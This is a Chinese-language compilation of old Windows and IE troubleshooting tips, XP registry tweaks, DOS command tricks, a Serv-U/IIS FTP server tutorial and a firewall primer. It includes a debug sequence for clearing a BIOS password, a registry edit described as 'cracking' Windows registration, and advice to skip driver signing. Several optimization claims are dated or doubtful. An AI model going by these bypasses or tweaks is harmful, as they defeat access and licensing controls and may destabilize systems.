到海阔天空下载站http://ilike.myrice.com/soft_browse...舳耍翱谌缤?/a>

使用菜单“Settings”-“Set Restriction”进入限定窗口，在“Welcome”列表下选择对应的“Internet 选项”的相应标签，我们这里以限定主页为目的。

选择“General”，窗口中“Homepage”前划勾，重新启动浏览器，看看是否该设定项已经变“黑”，即不可更改了，如图

当然你也可以同时对其他的选项进行限定。上面讲了，IEP的功能不仅在“封死”选项上，对于一些浏览器个性化设定，同样是相当有效的，比如下面的这个问题。

4> 我的浏览器Title信息被恶意锁死了，怎么办？

了解网页设计知识的网友都知道，在浏览器窗口最上的Title信息所显示的内容往往是根据不同的网页设定而相异的。它的作用是帮助访问者更快的了解当前网页的主体内容，从而决定是否继续或者确定当前页是否为请求页。

在一些公共上网的场合（比如网吧等），我们经常看到浏览器的Title信息保持不变的总是固定的内容，这些内容多是用来宣传，推广的。无疑它们的存在影响了正常的网页浏览。

甚至当我们浏览网页时，也经常碰到类似前面的问题，无意间Title信息居然也被改的面目全非了，主页我们还可以通过重复设定更改过来，因为Title信息属于网页自身的属性，IE不可能提供关于它的正面设定。

使用“故障3”中的插件同样也可以解决这个问题，注意下面的窗口：

保持“Window Title Name”中内容为空。

5> 脱机浏览突然“失效”了，怎么办？

通过IE的“脱机浏览”功能，我们能够查看所有已经下载到本地PC上的网页内容，操作上，在“文件”菜单下的“脱机浏览”前划勾，然后直接输入网址就可以了。

然而有些时候，一些特定的问题（比如更改系统日期等）往往造成“脱机浏览”功能不可用，当然有个前提，目标网页不是因为被删除而影响浏览的。

这时我们就可以通过直接在“临时文件夹”中搜索的方法来激活它了，首先记住目标网页的文件名，选中C:\windows目录下的“Temporary Internet Files”文件夹，右击选择“查找”项。如图

在“名称”中键入文件名，单击“开始查找”，在结果列表里双击目标页打开即可。

6> IE突然坏了,怎么办?

用时间长了，浏览器难免会出现问题，IE也不例外，这里的“坏”主要是指因为IE相关文件丢失或被破坏而造成的不能使用现象。

根据具体的破坏情况我们提供了三种解决办法：

首先，如果是人为造成的损坏，也就是使用者知道是哪个文件或哪个程序出了问题，直接到其他的机子上拷贝一个就好了。这是最简单的。

同时你还可以利用系统提供的“添加/删除程序”完成IE的自动修复，在“控制面板”中选择“添加/删除程序”命令，选中列表中的IE项，

单击下面的“添加/删除”按钮，

选择“修复Internet Explore”系统会自动修复错误的文件，如果是在向高版本升级过程中出现问题的，还可以选择“恢复以前的Windows 配置”回到升级以前的良好状态。

确定，系统会弹出修复程序提示框

单击“是”，完成后重新启动计算机。然后可以再试试看是否好了。IE的破坏往往是相当难对付的毛病，即便是前面两种方法也不一定有效，好在我们还有最后一招。

重新安装IE。说起来简单，IE再安装可不是轻松的事，一个最大的问题就是我们根本不能从系统中完全卸载掉它，另外由于高版本对低级版本的“抵制”作用，系统甚至会拒绝安装。

这时我们就要手动降低IE的版本，然后才能继续以升级的方式完成修复。

"开始"-"运行",在输入框中键入"Regedit"命令,进入系统注册表编辑器窗口.逐层进入下面主键中,[HKEY_LOCALMACHINE\software\Microsoft\Internet Explorer],找到其下的Version键

将右边窗口中“IE”的键值更改为“4.0”或更低的版本，退出注册表重启计算机。现在就可以安装了。

7> 一不小心选了“自动完成”，怎么去掉呀？

浏览器常常利用Cookie功能记住一些用户曾经键入的信息，“自动完成”的使用就是个很好的例子。然而这个功能对一些用户而言，却并非是件好事，特别是对那些公共场合上网的网友们。

以邮箱登录为例，当你输入你的用户名“XXXX”时，下面的密码框内自动填充好上次你登录时用到的密码，也就是说，任何一个使用者都可以进入你的邮箱管理界面，够恐怖吧！

没关系，按照下面的步骤，你可以快速的清除它，避免密码被别人窃取了。

使用菜单“工具”-“Internet 选项”，选择“内容”选项卡，单击中间的“自动完成”按钮

取消“表单”及“表单的用户名和密码”复选框前面的对勾，同时单击“清除表单”和“清除密码”删除已记忆信息。“确定”后返回。

上面我们介绍了七种不同的IE故障，从分析可以看出它们的“难缠”之处主要体现在以下三点：1）故障发生的频繁性和重复性；2）排除操作上的复杂性；3）最后就是排除方法的隐蔽性。

           硬件优化

1、内存性能优化

Windows XP中有几个选项可以优化内存性能，它们全都在注册表下面位置：　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management

1）禁用内存页面调度（Paging Executive）

    在正常情况下，XP会把内存中的片断写入硬盘，我们可以阻止它这样做，让数据保留在内存中，从而提升系统性能。要注意的是，拥有很多内存的用户（256M以上）才好使用这个设置。这个设置的名字正如它的功能一样，叫“DisablePagingExecutive”。把它的值从0改为1就可以禁止内存页面调度了。

  2）　提升系统缓存：把LargeSystemCache键值从0改为1，Windows XP就会把除了4M之外的系统内存全部分配到文件系统缓存中，这意味着XP的内核能够在内存中运行，大大提高系统速度。剩下的4M内存是用来做磁盘缓存的，在一定条件下需要的时候，XP还会分配更多一些。一般来说，这项优化会使系统性能得到相当的提升，但也有可能会使某些应用程序性能降低。正如前面所说的，必须有256M以上的内存，才好激活LargeSystemCache，否则不要动它。

   3）输入/输出性能：这个优化只对server用户才有实在意义——它能够提升系统进行大容量文件传输时的性能。在默认情况下，这个键值在注册表中是不存在的，必须自己建一个DWORD（双字节值）键值，命名为IOPageLockLimit。多数人在使用这项优化时都发现8到16M字节之间性能最好，具体设什么值，可以设进去试试看哪个值可以获得最佳性能。记住这个值是用字节来计算的，因此，譬如你要分配12M的话，就是12 * 1024 * 1024，也就是12582912。跟前面的内存优化一样，只有当你的内存大于256M的时候才好更改这里的值。

2、WinXP的ADSL拨接功能

方法:控制台-->网路连线-->建立一个新连线-->连线到网际网路

-->手动设定我的连线-->使用需要使用者名称和密码的宽频连线来连线

-->ISP名称(随便填你想要的,如Hinet...)-->使用者名称.密码就填拨接帐号与密码

-->下面3选项看需要可选可不选(其实XP内建的防火墙功能不错)-->完成

P.S 如要开机就自动拨接上网的话,把连线ICON抓到启动中,应该就可以罗

XP的网路芳邻(先假设网路都没问题)

控制台-->使用者帐户-->建立新的帐户

-->输入那台电脑的开机帐号(电脑名称)及密码

-->选择"受限制的帐户"-->完成

这样别人就可以登陆你的电脑里罗

3、XP里怎麽开DMA

关於DMA:

到装置管理员里选择IDE ATA/ATAPI controllers

到Primary/Secondary IDE Channel里面的进阶设定

将所有的转送模式都设定为使用DMA(如果可用的话)

系统就会自动打开DMA支援(在BIOS里也应该要先设为支援DMA)

4、XP里关闭光碟Autorun功能

打开光碟机的内容,将自动拨放里所有的光碟格式都设为不要有任何动作。

OR

利用Group Policy (执行gpedit.msc) ：

到电脑设定-->系统管理范本-->系统

找到-->关闭自动拨放

按右键选-->内容,选择已-->启用,

在下面那里选-->所有的磁碟机,

然後套用,重新开机,应该也可以,但是这个方法不能关闭音乐CD的自动拨放

5、设置处理器二级缓存容量

    Windows XP无法自动检测处理器的二级缓存容量，需要我们自己在注册表中手动设置，首先打开注册表(运行中输入“Regedit”)，再打开:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\

    选择“SecondLevelDataCache”，根据自己所用的处理器设置即可，例如PIII Coppermine/P4 Willamette是“256”，Athlon XP是“384”，P4 Northwood是“512”

6、XP安装驱动程式往往因为数位签署关系挂不上去, 把数位签署忽略掉===>

控制台----->系统------>硬体----->装置管理员----->驱动程式签署---->略过

使用Winxp的网友请务必检查一下

开始-->>执行-->>regedit

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]

将 "RegDone" = 的数值，由 "0" 改成 "1"

如此才算完全"破解" ,这个动作很重要

很多奇怪的小毛病因此而解决

7、为IRQ中断请求排优先次序

    计算机的每一个主要部件都设了个IRQ中断号。这里就是要通过修改每个IRQ请求的优先次序达到优化目的。这里主要的优化对象是系统/CMOS实时钟，它通过主板来提升性能。首先，要确定你想要哪个组件获得更高的性能，然后找到这个硬件正在使用的IRQ中断号。怎么找呢？打开控制面板里的系统属性（也可以按键盘上的Windows+Break热键组合打开它）。选中“硬件”选项卡，然后点击“设备管理器”按钮。

右键点击要查IRQ号的组件，选择“属性”，然后点击“资源”选项卡。

这里可以看到设备正在使用的IRQ中断号（如果没有IRQ中断号，选择另一个设备）。把中断号记下来，然后运行注册表编辑器regedit，找到注册表中的HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\

PriorityControl 位置。我们要在这里建立一个名为IRQ#Priority（其中“#”是具体的IRQ中断号）的DWORD双字节值，然后把它的值设为1。譬如说，我的系统CMOS实时钟的IRQ中断号是8，我要建立的键名就是IRQ8Priority。重新启动计算机之后，就会发现刚优化过的组件性能有所提高。笔者强烈建议用这个方法优化系统CMOS实时钟，因为它能改善整块主板的性能。当然也可以把多个IRQ中断号优先级提高，但这样做的效果没那么好，而且有可能造成系统不稳定。要把这个优化设置撤消的话，只要把刚才建立的注册表键值删掉就OK了

这个如何：http://www.366tian.com/bbs/showthre...&threadid=45526

DOS命令八大经典案例

DOS已逐渐远去，我们每天都习惯地使用着Windows 98/Me/2000/XP，可是你了解Windows中的DOS吗?其实在有些时候DOS还是比Windows要方便快捷得多，毕竟这个是操作系统的经典之作。下面就笔者在使用DOS过程中摸索的技巧总结成八大案例来说明一下，希望多多少少能对读者在使用电脑的过程中有点启发和帮助。

    案例一、“FC”—文件对比

    众所周知，在安装软件时，一般会在注册表中或多或少留下点什么，时间一长就会有大量的垃圾留在里面，让我们的系统逐渐变慢直至崩溃。诚然现在有很多好用的工具可以帮我们解决这个难题，可是如果我们想知道它们究竟在注册表中留下了什么，而手头又没有合适的工具，难道就束手无策了吗﹖等等，我们请出DOS下最方便的比较工具——“FC”

    格式：FC [path]＜filename＞[path]＜filename＞＜/b＞

    使用方法：首先在安装软件前把注册表导出为一个文件如：“1.reg”，在安装软件后再导出为一个文件如：“2.reg”。这两个文件假设都放在C盘根目录下。我们进入MS-DOS方式输入“C：\fc 1.reg 2.reg”回车。看到了没有？屏幕上显示的正是注册表被改动的地方。

    注：FC默认逐行比较两个文件。文件中每一行的长度应小于256个字符，如果行长超过256个字符或者比较对象是二进制文件或程序文件，应在后面加上/b参数，FC将对它们逐字节比较。

案例二、“>”—定向输出

    我们接着上面的案例。有的时候我们在用上面的方法时发现屏幕不停地往上滚动，好多信息一闪而过停都停不下来，这种情况是由于两个文件相差太大的缘故，文件被改动的地方太多了。怎么办呢﹖别着急，这时候我们要用到另外一个小技巧——使用定向输出“>”

    格式：命令(或程序)>定向输入设备(或文件名)

    使用方法：我们还用上面的例子，在DOS下输入C：\fc 1.reg 2.reg ＞change.txt回车。

    怎么什么信息都没了啊。其实你仔细看一下就会发现在该目录下多了一个FC.txt文件，快用写字板打开它啊，里面可是放着这两个文件的全部比较信息呀：）so easy 吧。

    注：你可以把它输出为任何格式的文件，它们都可以以文本方式打开。

    案例三、“copy”—文件合并

    有很多时候网上把视频文件分割成好多小段让大家分别下载，可是下载好的文件在看的时候又老是不停地要打开，那么有没有什么办法让它们重新合并成一个整的文件呢?用专门的视频编辑工具固然可以，可是那繁琐的E文让我辈头痛。其实DOS下就有现成的工具，用我们常用的“copy”命令就可以完成，让我们来看看吧。

    格式：copy /b ＜filename1＞+＜filename2＞+…+＜filenameN＞＞filename＞

    使用方法：假设你的硬盘有两个文件分别是video1.mpg 和 video2.mpg 那么我们在该目录下输入“copy /b video1.mpg+video2.mpg video.mpg”就可以了，其中video.mpg是你合并后生成的新文件名。赶紧试一试，打开播放器看看是不是拼合好了。

    当然，你喜欢的小说、音乐，如果嫌不停地打开关闭太麻烦，不妨试试这个方法把它们合并在一起观看。

    案例四、“copy”—批量重命名

    一个朋友要做项目需要把一系列文本文件按编号重新命名，可是由于数量实在太多，在Windows中一点点地改太麻烦了，头都大了：（有没有简单一点的方法呢﹖）好多杂志上介绍了好多工具和方法来实现这个，可是我觉得都比较麻烦。其实我们把DOS命令和回收站结合使用就可以完成批量改名。

    使用方法：假设E盘上有大量要改名的文件，那么首先把它们弄到回收站里!（切记!仅仅只是删除，不要清空回收站啊，文件丢了我可不负责!），然后我们进入MS-DOS模式下的E盘，在根目录下输入“cd recycled”进入回收站，dir看看，是不是所有的文件名都改变成有顺序的了：）接下来我们把它们都给拷贝出来。输入“copy *.* e：\”哈哈，返回Windows去看看吧是不是所有的文件都为DE1、DE2……了。

    注：1.删除之前要先清空“回收站”，否则文件将有可能从未知数字基数开始。

    2.在哪个盘删除的就进入哪个盘的recycled文件夹，别的盘里没有对应文件的。

    3.文件名被修改后命名格式为DX1，D是固定的表示DISK，X是对应你的盘符，如果是在F盘就是DF1，如果是D盘就是DD1，依此类推。

案例五、“copy”—改文件日期

    某同事因为工作需要要修改文件的日期，在Windows中忙乎了半天也不知道该怎么改：（难道我们真的只能求助于专用工具了吗?其实不然，同样是使用copy命令就可以轻松完成：）



    格式：copy ＜filename＞+



    使用方法：假设我们要修改的文件是redate.dat文件，它在C盘，那么我们首先进入MS-DOS方式，在C盘下输入“copy 123.dat+，，”（注：加号后面紧跟2个逗号）回车后系统会询问你是否覆盖?这时键入“Y”即更改为当前日期，是不是非常简单啊?

    案例六、FDISK—修复引导区

    同事今天开机突然发现系统无法启动，屏幕提示“No System，System Halted”其实根据提示我们可以知道，问题肯定出在硬盘的引导区上。这种情况一般是引导记录损坏或被病毒感染，或是分区表中无自举标志，还有可能是结束标志55AAH被改写而造成的。

    格式：fdisk /MBR

    使用办法：用DOS引导盘启动电脑，在提示符下执行“FDISK /MBR”命令。FDISK中本身就包含有主引导程序代码和结束标志55AAH，这一招对于修复主引导记录和结束标志55AAH既快又灵，而且不用担心会损坏任何硬盘上的文件!

案例七、“ping”—查看是否连线

    在网吧上网时服务器突然断线，网管在解决故障，看他忙得满头大汗我们都不好意思问“什么时候可以通”。可是总不能打开个网页不停按刷新吧，这个时候用一个简单的DOS命令就可以在最短的时间内检测出什么时候能连上线了，而且还不用那么费事：）

    格式：ping ＜count name＞ -t

    使用方法：在MS-DOS模式下执行“ping www.XXX.com -t”就可以啦：）你可以看到屏幕不停地上滚，如果是通的话就会显示“Reply from xxx.xxx.xxx.xxx： bytes=32 ……”的信息，否则就显示“Destination host unreachable”。这样你就可以一边干别的一边在第一时间知道什么时候网络是通的啦。

    案例八、“debug”—破解COMS

    朋友的品牌机CMOS被他无意中锁住了，怎么办呢﹖这时候你也许会说打开机箱给电池放电不就行了吗。可是品牌机如果拆了机箱多半保修的问题就泡汤了。其实DOS下有个非常好用的工具来解开这个密码——DEBUG。由于这个是个工具，它实在太博大精深了，所以没法给出格式。不过可以跟着我一步步地做，咱们不学太多，只就事论事不就成了。

    启动系统后进入DOS模式，如果是Windows Me（XP）则用启动盘启动，在DOS下输入以下指令：

    debug

    -o70 21

    -o71 20

    -q

    好了，咱们重新启动电脑看看是不是已经解开了：

    关于案例分析咱们就先说到这里了，虽然DOS已经落伍淘汰离我们远去了，可是当你的系统出现蓝屏时、当你的系统崩溃时、当你对一些问题的解决觉得烦琐时，也许DOS能给你最好的答案。

Serv-U教程 （建FTP的会员必看）

FTP服务器端软件Serv-U教程（一）

Serv-U是一种被广泛运用的FTP服务器端软件，支持3x/9x/ME/NT/2K等全Windows系列。可以设定多个FTP服务器、限定登录用户的权限、登录主目录及空间大小等，功能非常完备。安装文件共2.93M。

请注意以上的Serv-U管理品的工具栏。从左到右依次为：删除用户（据情况可能是其他）、复制用户（据情况可能是其他）、取消操作（不保存所做修改）、保存操作（保存所作修改）、刷新、帮忙、购买（连到Serv-U的站点）、关于Serv-U。每一步做完之后，不要忘了按那个勾保存你的结果！

邮件本应用教程以Serv-U 4.0加上WIN2K为例，面向是对Serv-U一无所知的人。本系列为第一部分，目前共有文章六篇，涵及从Serv-U的下载、安装、建立第一个可用的FTP服务器及进一步的设置等。我尽量放多的图片，并配以详尽的文字说明，相信会对初学者有所帮忙

第一节 Serv-U的安装和基本设置

一、安装

展开压缩文件"ServU4.zip"，执行其中的"setup.exe"，即可开始安装；全部选默认选项即可。安装完成后不需重新启动，直接在"开始→程序→Serv-U FTP Server"中就能看到相关文件。

二、建立第一个可用的FTP服务器

1、比如本机IP地址为"192.168.0.48"，已建立好域名"ftp.bbc.com"的相关DNS记录。

2、打开Serv-U管理器。选上图的"Serv-U Administrator"，即出现"Setup Wizard"（设置向导）。此向导可以帮你轻松地完成基本设置，因为建议使用它。直接选"Next"（下一步）。

3、请随着安装向导按以下步骤来进行操作：

⑴IP address（IP地址）：输入"192.168.0.48"。（如果使用动态的或无合法的IP地址则此项为空。）

⑵Domain name（域名）：输入"ftp.bbc.com"。

⑶Install as S Y S T E M server（安装成一个系统服务器吗）：选"Yes"。

⑷Allow anonymous access（接受匿名登录吗）：此处可根据自己需要选择；比如选"Yes"。

⑸anonymous home directory（匿名主目录）：此处可输入（或选择）一个供匿名用户登录的主目录。

⑹Lock anonymous users in to their home directory（将用户锁定在刚才选定的主目录中吗）：即是否将上步的主目录设为用户的根目录；一般选"Yes"。

⑺Create named account（建立其他帐号吗）：此处询问是否建立普通登录用户帐号；一般选"Yes"。

⑻Account login name（用户登录名）：普通用户帐号名，比如输入"nanshan"。

⑼Password（密码）：设定用户密码。由于此处是用明文（而不是＊）显示所输入的密码，因此只输一次。

⑽Home directory（主目录）：输入（或选择）此用户的主目录。

⑾Lock anonymous users in to their home directory（将用户锁定在主目录中吗）：选"Yes"。

⑿Account admin privilege（帐号管理特权）：一般使用它的默认值"No privilege"（普通帐号）。

⒀最后选"Finish"（结束）即完成设置。

4、从上图中可以看到，现在已经建立好了一个FTP服务器，服务器地址为"ftp.bbb.com"，其下有两个用户，一个是匿名用户"Anonymous"，其密码为空；一个是普通用户"nanshan"，其密码为在向导中输入的内容。

5、基本权限。比如在左边的面板中选中"nanshan"用户，则在右边的面板中出现如下图的设置窗口。选"Dir Access"（目录存取权限），即可设置此用户在它的主目录（即"Path"）是否对文件拥有"Read"（读）、Write（写）、"Append"（写和添加）、"Delete"（删除）、"Execute"（执行）；是否对目录拥有"List"（显示文件和目录的列表）、"Create"（建立新目录）和"Remove"（修改目录，包括删除，移动，更名）；及"Inherit"（以上权限是否包括它下面的目录树）等等。

三、使用此FTP服务器

1、DOS下的登录格式。如"ftp ftp.bbc.com"。

2、浏览器中的登录格式。如"ftp://ftp.bbc.com";;。

3、FTP客户端应用软件的设置。

第二节 Serv-U 管理器

一、"Local Server"（本地服务器）属性

1、Local Server（本地服务器）：此处可设置是否自动开启FTP服务以及手动开启或停止FTP服务等。

2、License（许可证）：共享版此项无内容。

3、Settings（设置）：

⑴General/Max. speed：可设置最大传输速率（kb/s）。

⑵General/Max. no. of users：可设置连接到本服务器的最多用户数。

⑶General的其他项目均与保持服务器的安全性有关。

4、Activity（活动状态）：

⑴Users（用户）：显示当前登录的用户IP地址等资料及当前工作状态；建议选中"Auto reload"（自动刷新）。如果选中某个用户，单击右键，再选"Kill User"，即可将它从服务器中踢出去。

⑵Blocked IPs（被挡住的IP）：此处用来暂时禁止某些IP访问本系统。单击工具栏的"＋"即可增加即可增加被暂时禁止的IP地址及禁止登录的总时间（从增加之后开始计算）。列表中可以看见被禁止的IP地址及其对应的计算机的完整的域名和离解禁尚有多少时间（以秒为单位）等等。在列表中单击右键即可以选择删除已禁止的IP地址。

⑶Session Log（系统日志）：记录所有登录（或试图登录）到本机的操作痕迹及错误信息等。

二、"Domains"（域名）属性

1、ftp.bbc.com（即选中的FTP服务器名）：此处可修改相应域名、IP地址及端口号等。

2、Settings（设置）：及完全允许或禁止登录的IP地址等。

⑴General/Max no. of Users（最大用户数）：此处可以设置允许同时登录到本FTP服务器的最大用户数。

⑵IP Access/Deny access（拒绝）：此处可设置仅仅拒绝登录到本FTP服务器的计算机的IP地址列表。

⑶IP Access/Allow access（允许）：此处可设置仅仅允许登录到本FTP服务器的计算机的IP地址列表。

⑷IP Access/Rule（规则）：此处可输入指定的IP地址或IP地址的范围。接受如"192.168.0.88"之类的单个IP地址；接受如"192.168.0.4-192.168.0.11"之类的IP地址范围；接受如"192.168.0.*"之类的通配符；接受如"192.168.0.1?"之类的单个字符的限制等多种格式。"Add"为添加，"Remove"为删除。

⑸Message（信息）：此处可改变一些提示性显示信息，如"Signon message file"（开始广播）、"Server offline"（服务器未工作）、"No anonymos access"（不接受匿名登录）等等。

3、Activity（活动状态）：

⑴Users（用户）：显示登录到本服务器的用户及其状态；建议选中"Auto reload"（自动刷新）。

⑵Domain Log（系统日志）：记录所有登录（或试图登录）到本服务器的操作痕迹及错误信息等。

4、Groups（组）：

⑴利用Groups（组）可以预先建立好一个或多个确定了属性（读写等）和控制权限（授予或禁止某些IP地址访问）的目录，以后当我们建立新的用户，需要用到这些目录时，就直接添加进去就行了，不用再进行重复设置。在这种情况下，组的建立可以大大减轻设置工作量。

⑵建立一个新组：选"Group→右键→New Group"，然后在"Group name"中输入组的名字再按"finish"（结束）即可。

⑶设置"Dir Access"（目录存取权限）：在此处选"Add"（增加）增加目标目录（可多个），然后再为它们逐个设置存取权限。本项具体设置请参见本教程后文相关内容。

⑷和"IP Access"（IP控制）：此项的具体设置请参见本文前列相关内容。

⑸组的复制：可以像复制文件一样复制所建立的组。选中组名，单击右键，再选"Copy Group"即可复制此组，选几次就复制几个。真是好功能！^-^

⑹使用"Group"（组）：在"Users"下选中要使用组的用户名，再点击右边面板中"Group(s)"后的图标，选择所需要的组名（可用Ctrl键或Shift键来同时选中多个组）；多个组名中会自动以逗号进行分隔。

⑺进入"Dir Access"，再按工具栏的刷新图标（书图标左边的那个），即可看到最后的效果。

第三节 Serv-U用户属性之"Account"（帐号）

一、Account（帐号）选项。

二、各项说明和应用实例

1、Disable account（禁用帐号）：如果选中它，则此帐号将无法使用。

2、User name（用户名）：此处显示并可改变该用户的登录名；修改后，左边面板的用户名也会自动作相应的变更。

3、Group(s)（组）：如果有建立组，则此处可通过选择组来更多的目录。这些组中目录的属性由建立组时确定，用户在"Dir Access"中不能修改！如果组用户的主目录不在根目录（见下面第5项说明）所包含的目录树之内，则此组用户无法进入。

4、Password（密码）：此项为"<>"（加密）说明有密码，为保密，因此内容不予显示。如果为空白，则不需密码；如有输入任何密码均显示"<>"。

5、Home directory（主目录）：此处原则上为用户登录后的主目录；实际用户登录的根目录将由"General"属性中的"Lock user in home directory"来决定。

⑴比如此处路径为"d:\myweb"，"General"中相应项为选中，则主目录和根目录均为"d:\myweb"。

⑵再比如此处路径为"d:\myweb"，"General"中相应项为不选中，则主目录为"d:\myweb"，而根目录则为"d:\"。

⑶注意：此处可据情修改，但不能超出"Dir Access"中"Path"所在盘的范围，否则登录后你将什么也看不见！

6、Notes（备注）：此项用来标注一些说明性的文字。

第四节 Serv-U用户属性之"General"（常用）

一、"General"（常用）选项。

二、各项说明和应用实例

1、Lock user in home directory（将用户锁定在主目录）：如果选中则只允许用户访问"主目录"以下的文件和目录（主目录即为根目录）；如果不选中，则用户可一直访问到主目录所在盘的实际根目录（比如"d:\"）下——当然，可能并没有读其下其他文件目录或写等权限，但是仍建议一般选中此项。

2、Hide 'hidden' files（隐藏"隐含"文件）：在列表时不显示属性为"隐含"的文件。

3、Always allow login（总是接受登录）：本帐户永远有效。

4、Allow only N login(s) from same IP address（只接受同一个IP地址的N个用户登录）：对于限制外部局域网接入的机器数量非常有用！

5、Allow user to change password（接受用户改变密码）：有些FTP客户端有允许用户改变自己FTP密码的功能，此处就是为它们准备的。

6、Max. upload speed（最大上载速率）：可以限制客户端上传文件的最大速率（以kb/s为单位）。

7、Max. download speed（最大下载速率）：下传文件的最大速率（以kb/s为单位）。

8、Idle time-ou（空闲溢出时间）：超过某分钟不工作（读写等操作）就丢弃已产生的连接。

9、Max. no. of users（最大用户数）：允许同时连接到本服务器的最多的用户数目。

10、Logging message file（登录信息文件）：在这里可以输入（或选择）一个事先建立好的文本文件（一般）的完整路径和文件名，登录成功之后就会出现相关提示信息。

11、Password type（密码类型）：一般选默认的"Regular Password"（常规密码）。

第五节 Serv-U用户属性之"Dir Access"（目录存取属性）

一、"Dir Access"（目录存取属性）选项。

二、各项说明和应用实例

1、Path（路径）：目录所在的实际路径；Access（属性）：存取属性；Group（组）：所属组。

2、Files/Read（读）：对文件进行"读"操作（复制、下载；不含查看）的权力。

3、Files/Write（写）：对文件进行"写"操作（上传）的权力。

4、Files/Append（附加）：对文件进行"写"操作和"附加"操作的权力。

5、Files/Delete（删除）：对文件进行删除（上传、更名、删除、移动）操作的权力。

6、Files/Execute（执行）：直接运行可执行文件的权力。

7、Directories/List（列表）：对文件和目录的查看权力。

8、Directories/Create（建立）：建立目录的权力。

9、Directories/Remove（移动）：对目录进行移动、删除和更名的权力。

10、Inherit（继承）：如选中则以上所选属性对所选"Path"中指定目录以下整个目录树起作用；否则就只对当前目录起作用。

11、对于有多个"Path"的情况，有时顺序是至关重要的。比如主目录为"d:\myweb"，其下有一个路径为"d:\myweb\win98"的目录，现在想让当前用户对"d:\myweb\win98"只能有查看权力，而对主目录下其他目录则有完全控制的权力。需要：

⑴"Add"一个"Path"，选择"d:\myweb"，权限为所有都选中（特别要包括"Inherit"）；再"Add"另一个"Path"，选择"d:\myweb\win98"，权限为只选"List"（列表）。

⑵如果主目录在前，另一个目录在后，则你登录进去后就会发现，你对"win98"目录一样有完全控制权！

⑶但是如果你把主目录放在后，另一个目录在前，则结果正是你所需要的。

因此，可以总结出，此处设置的基本规律是，有特殊属性的放在前面，共用属性的放在后面！

第六节 Serv-U用户属性之完结

一、"IP Access"（IP访问）选项。

1、Deny Access（拒绝访问）：选中此项则下面列出的IP地址被拒绝访问此FTP服务器。

2、Allow Access（允许访问）：选中此项则只有下面列出的IP地址被允许访问此FTP服务器。

3、Rule（规则）：在此处输入IP地址，再按向下的手图标则被加进列表；向上的手是删除选中的IP地址。

二、"UL／DL Ratios"（上传／下载比例）选项。

三、"Quota"（配额）选项。

1、Enable disk quota（允许磁盘配额）：如选中此项则可设定上传空间的大小。

2、Current（当前）：这里显示的是已用空间；可通过按"Calculate current"按钮来得到此值。

3、Maximum（最大）：这里可设定最大的上传空间。

4、以上单位均为"kb"（千字节）。

四、其他操作

1、增加新的FTP服务器：选左边面板中的"Domains→右键→New Domain"，再提示操作即可。需要注意的是，如果它与现有的FTP服务器使用同一个IP地址，则必须选不同的端口号！

2、删除FTP服务器：选中左边面板中的相应服务器名，再选"右键→Delete"即可。

3、建立新用户：选中左边面板中的相应服务器名，再选"右键→New User"即可。

4、删除用户：选中左边面板中的相应用户名，再选"右键→Delete User"即可。

5、复制用户：选中左边面板中的相应用户名（也可在其右边面板的任意处），再选"右键→Copy User"即可。此项也非常有用！

局域网内个人ftp的搭建

首先你必须具备的条件：

1：你必须具有网管权限

2：主服务器操作系统是WIN2K。

下载一个FTP服务端软件，FTP serv-u(本机上如果装了ＩＩＳ也可以），完成安装。

下面是在服务器（也就是局域网代理服务器）上要做的工作，以保证你的ＦＴＰ可以对外服务。

一,建产ＤＮＳ记录

1、打开DNS控制台：选“开始菜单→程序→管理工具→DNS”。

２，建立域名“ftp.dasha.com”映射IP地址“192.168.0.50”(这个ＩＰ就是客户端的真

  正ＩＰ）的主机记录。

①建立“com”区域：选“DNS→WY（你的服务器名）→正向搜索区域→右键→新建区域”，然后根据提示选“标准主要区域”、在“名称”处输入“com“

②建立“dasha”域：选“com→右键→新建域”，在“键入新域名”处输入“dasha”

③建立“ftp”主机。选“dasha→右键→新建主机”，“名称”处为“ftp”，“IP地址”处输入“192.168.0.50”，再按“添加主机”。

现在测试一下，“运行”输入"ping ftp.dasha.com"

二、“ftp.abc.com”的设置

1、打开“默认FTP站点”属性窗口：选“默认FTP站点→右键→属性”即可。

2、设置“FTP站点”：在“IP地址”处选“192.168.0.50”，端口号保持默认值“21”不变。

3、设置“消息”：在“欢迎”框中输入登录成功后的欢迎信息，“退出”中为退出信息。

4、设置“主目录”：在“客户机”中按“浏览”按钮选择目标目录“E:\myweb”。

5、设置“安全帐号”：默认的，匿名用户（Anonymous）被允许登录，如果有必要，此处可选拒绝其登录以增加安全性；或增加其他用于管理此FTP服务器的用户名（默认的为“Administator”）。

6、设置“目录安全性”：此处可以设置只被允许或只被拒绝登录此FTP服务器的的计算机的IP地址。

7、如需要，也可在“默认FTP站点”处单击右键选“新建”来新建FTP的虚拟目录。

三、“ftp.dasha.com”的测试

  1、在浏览器中登录：格式为ftp://ftp.dasha.com”或“ftp://用户...没械锹肌?/a>

2、在DOS下登录：格式为“ftp ftp.abc.com”。

3、用FTP客户端软件登录

4、如果“主目录”下有与用户同名的“虚拟目录”或“实际目录”，则该用户会直接登录到其同名目录中。

注意第二部的工作，你还可以填加另一个ＦＴＰ站点，不过之前，你还得进行第一步的工作。

三，开始客户端的ＦＴＰ服务器软件设置。

设置过程请看（以ＦＴＰ serv-u为例）

下载地址：

英文原版

链接1：http://ln-down.skycn.net/down/susetup.exe

链接2：http://jshttp.skycn.net/down/susetup.exe

链接3：http://cbbnhttp.skycn.net/down/susetup.exe

汉化补丁：

链接1：http://ln-down.skycn.net/down/HB-ServU4100-LDR.zip

链接2：http://jshttp.skycn.net/down/HB-ServU4100-LDR.zip

链接3：http://cbbnhttp.skycn.net/down/HB-ServU4100-LDR.zip

FTP Serv-U 服务器组建攻略

http://www.skycn.com/article/425.html

防火墙之所以能保护网络，应该取决于防火墙所使用的策略或者是方法。当今我们所长提到的防火墙，暂且分类为4种：

1.包过滤型防火墙

2.应用级网关型防火墙

3.电路级网关型防火墙

4.状态检测型防火墙

一、包过滤型防火墙

包过滤防火墙的工作原理是使用了包过滤机制，这种包过滤机制的系统依赖于数据传输的一般结构，而这些结构所使用的数据包头包含有IP地址信息和协议所使用的端口信息，根据这些头部信息，系统可以决定是否将数据包发往下一个目的地址。

在数据包通过防火墙的过程中，防火墙对每一个数据包都要进行检查，如同我们通过安全检查一样，每个人都要出示自己的相关证件，不能漏过任何人。

